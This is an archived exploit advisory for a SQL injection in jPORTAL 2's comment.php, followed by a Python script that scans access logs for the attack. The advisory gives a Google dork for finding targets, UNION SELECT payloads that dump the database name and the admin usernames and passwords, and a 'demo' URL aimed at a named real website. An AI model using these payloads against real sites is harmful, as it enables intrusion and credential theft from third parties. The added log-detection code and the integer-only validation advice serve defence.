jPORTAL 2 SQL Injection

2012-01-01T00:00:00
ID PACKETSTORM:108285
Type packetstorm
Reporter Farbod Mahini
Modified 2012-01-01T00:00:00

Description

                                        
`############################################################################  
# Exploit Title: jPORTAL 2 SQL Injection Vulnerability   
# Google Dork: "powered by jPORTAL 2"   
# Date: 8/12/2011  
# Author: H4ckCity Security Team  
# Discovered By: farbodmahini  
# Home: WwW.H4ckCity.Org   
# Software Link: http://jportal2.com/  
# Version: All Versions  
# Security Risk: High  
# Tested on: GNU/Linux Ubuntu - Windows Server  
############################################################################  
# Exploit:  
#   
# http://target.com/comment.php?what=news&id=[sqli]  
#  
# To get the DB:  
#  
# http://target.com/comment.phpwhat=news&id=999 union all select null,null,(select distinct   
# concat(unhex(Hex(cast(schema_name as char)))) from `information_schema`.schemata limit   
# 1,1),null,null,null,null,null,null--  
#  
# To get the username & password:  
#  
# http://target.com/comment.phpwhat=news&id=999 union all select null,null,(select concat  
# (unhex(Hex(cast(admins.nick as char))),0x3a,unhex(Hex(cast(admins.pass as char)))) from   
# `target_database`.admins Order by nick limit 0,1) ,null,null,null,null,null,null--   
#   
# Demo:  
#  
# http://www.lotnisko.szprotawa.org.pl/comment.php?what=news&id=3 union all   
# select null,null,(select concat(unhex(Hex(cast(admins.nick as char))),0x3a,unhex(Hex(cast  
# (admins.pass as char)))) from `tmnet_lotnisko`.admins Order by nick limit 0,1)   
# ,null,null,null,null,null,null--  
#  
############################################################################  
# Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R-   
# nitrojen90-hellboy-K0242-kingcope-Mr.M4st3r , ...  
############################################################################  
GreetZ : All H4ckCity Member  
############################################################################  
`
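
Added example, not part of the original advisory: a log check that flags requests to `comment.php` whose `id` parameter is not a plain integer, which is the injection point described above. The combined access-log format, the 10-digit limit on a legitimate `id`, and the sample log lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.+?) HTTP/[\d.]+"')
# A legitimate id is assumed to be a short decimal integer, as in "id=3".
NUMERIC_ID_RE = re.compile(r"[0-9]{1,10}")
# SQL tokens seen in the advisory's payloads; used only to label a finding.
SQL_HINT_RE = re.compile(r"\b(union|select|information_schema|concat|unhex)\b", re.I)


def check_line(line):
    """Return (client, id_value, reason) for a suspicious comment.php hit, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith("/comment.php"):
        return None
    # parse_qs percent-decodes values and turns '+' into a space.
    for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        if NUMERIC_ID_RE.fullmatch(value):
            continue
        reason = "sql-keywords" if SQL_HINT_RE.search(value) else "non-numeric-id"
        return (line.split(" ", 1)[0], value, reason)
    return None


def scan(lines):
    """Check every log line and return the findings in input order."""
    return [hit for hit in map(check_line, lines) if hit]


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2012:10:00:00 +0000] "GET /comment.php?what=news&id=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2012:10:00:05 +0000] "GET /comment.php?what=news&id=999%20union%20all%20select%20null,null-- HTTP/1.1" 200 4875',
    '198.51.100.7 - - [01/Jan/2012:10:00:09 +0000] "GET /comment.php?what=news&id=999 UNION ALL SELECT null HTTP/1.1" 200 4875',
    '203.0.113.4 - - [01/Jan/2012:10:01:00 +0000] "GET /comment.php?what=news&id=3%27 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2012:10:02:00 +0000] "GET /index.php?id=1%20union%20select%201 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, value, reason in scan(SAMPLE_LOG):
        print(f"{client}\t{reason}\t{value!r}")
```

The same integer-only rule, enforced at the application or a WAF in front of it, rejects these requests before they reach the database query.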